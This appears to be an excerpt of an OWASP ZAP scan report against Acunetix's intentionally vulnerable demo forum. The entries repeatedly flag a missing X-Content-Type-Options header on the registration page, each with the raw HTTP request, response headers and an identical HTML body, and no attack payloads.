Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:24 GMT Content-Length: 3613 |
| Response Body - size: 3,613 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum register</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Login.asp?RetURL=%2FSearch%2Easp%3F" class="menu">login</a> - <a href="./Register.asp?RetURL=%2FSearch%2Easp%3F" class="menu">register</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" id="tfUName" class="Login"></td> </tr> <tr> <td>Real name:</td> <td align="right"><input name="tfRName" type="text" id="tfRName" class="Login"></td> </tr> <tr> <td>Email:</td> <td align="right"><input name="tfEmail" type="text" id="tfEmail" class="Login"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" id="tfUPass" class="Login"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Register me"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2FSearch%2Easp%3FtfSearch%3DZAP |
| Method | GET |
| Parameter | X-Content-Type-Options |
| Attack | |
| Evidence | |
| Request Header - size: 374 bytes. |
GET http://testasp.vulnweb.com/Register.asp?RetURL=%2FSearch%2Easp%3FtfSearch%3DZAP HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/Search.asp?tfSearch=ZAP Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:33 GMT Content-Length: 3554 |
| Response Body - size: 3,554 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum register</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2FSearch%2Easp%3FtfSearch%3DZAP" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" id="tfUName" class="Login"></td> </tr> <tr> <td>Real name:</td> <td align="right"><input name="tfRName" type="text" id="tfRName" class="Login"></td> </tr> <tr> <td>Email:</td> <td align="right"><input name="tfEmail" type="text" id="tfEmail" class="Login"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" id="tfUPass" class="Login"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Register me"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowforum%2Easp%3Fid%3D0 |
| Method | GET |
| Parameter | X-Content-Type-Options |
| Attack | |
| Evidence | |
| Request Header - size: 364 bytes. |
GET http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowforum%2Easp%3Fid%3D0 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showforum.asp?id=0 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:25 GMT Content-Length: 3549 |
| Response Body - size: 3,549 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum register</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowforum%2Easp%3Fid%3D0" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" id="tfUName" class="Login"></td> </tr> <tr> <td>Real name:</td> <td align="right"><input name="tfRName" type="text" id="tfRName" class="Login"></td> </tr> <tr> <td>Email:</td> <td align="right"><input name="tfEmail" type="text" id="tfEmail" class="Login"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" id="tfUPass" class="Login"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Register me"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowforum%2Easp%3Fid%3D1 |
| Method | GET |
| Parameter | X-Content-Type-Options |
| Attack | |
| Evidence | |
| Request Header - size: 364 bytes. |
GET http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowforum%2Easp%3Fid%3D1 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showforum.asp?id=1 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:29 GMT Content-Length: 3549 |
| Response Body - size: 3,549 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum register</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowforum%2Easp%3Fid%3D1" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" id="tfUName" class="Login"></td> </tr> <tr> <td>Real name:</td> <td align="right"><input name="tfRName" type="text" id="tfRName" class="Login"></td> </tr> <tr> <td>Email:</td> <td align="right"><input name="tfEmail" type="text" id="tfEmail" class="Login"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" id="tfUPass" class="Login"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Register me"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowforum%2Easp%3Fid%3D2 |
| Method | GET |
| Parameter | X-Content-Type-Options |
| Attack | |
| Evidence | |
| Request Header - size: 364 bytes. |
GET http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowforum%2Easp%3Fid%3D2 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showforum.asp?id=2 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:31 GMT Content-Length: 3549 |
| Response Body - size: 3,549 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum register</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowforum%2Easp%3Fid%3D2" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" id="tfUName" class="Login"></td> </tr> <tr> <td>Real name:</td> <td align="right"><input name="tfRName" type="text" id="tfRName" class="Login"></td> </tr> <tr> <td>Email:</td> <td align="right"><input name="tfEmail" type="text" id="tfEmail" class="Login"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" id="tfUPass" class="Login"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Register me"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D0 |
| Method | GET |
| Parameter | X-Content-Type-Options |
| Attack | |
| Evidence | |
| Request Header - size: 366 bytes. |
GET http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D0 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=0 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:49 GMT Content-Length: 3550 |
| Response Body - size: 3,550 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum register</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D0" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" id="tfUName" class="Login"></td> </tr> <tr> <td>Real name:</td> <td align="right"><input name="tfRName" type="text" id="tfRName" class="Login"></td> </tr> <tr> <td>Email:</td> <td align="right"><input name="tfEmail" type="text" id="tfEmail" class="Login"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" id="tfUPass" class="Login"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Register me"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D1 |
| Method | GET |
| Parameter | X-Content-Type-Options |
| Attack | |
| Evidence | |
| Request Header - size: 366 bytes. |
GET http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D1 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=1 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:48 GMT Content-Length: 3550 |
| Response Body - size: 3,550 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum register</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D1" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" id="tfUName" class="Login"></td> </tr> <tr> <td>Real name:</td> <td align="right"><input name="tfRName" type="text" id="tfRName" class="Login"></td> </tr> <tr> <td>Email:</td> <td align="right"><input name="tfEmail" type="text" id="tfEmail" class="Login"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" id="tfUPass" class="Login"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Register me"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D10 |
| Method | GET |
| Parameter | X-Content-Type-Options |
| Attack | |
| Evidence | |
| Request Header - size: 368 bytes. |
GET http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D10 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=10 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:51 GMT Content-Length: 3551 |
| Response Body - size: 3,551 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum register</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D10" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" id="tfUName" class="Login"></td> </tr> <tr> <td>Real name:</td> <td align="right"><input name="tfRName" type="text" id="tfRName" class="Login"></td> </tr> <tr> <td>Email:</td> <td align="right"><input name="tfEmail" type="text" id="tfEmail" class="Login"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" id="tfUPass" class="Login"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Register me"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D11 |
| Method | GET |
| Parameter | X-Content-Type-Options |
| Attack | |
| Evidence | |
| Request Header - size: 368 bytes. |
GET http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D11 HTTP/1.1
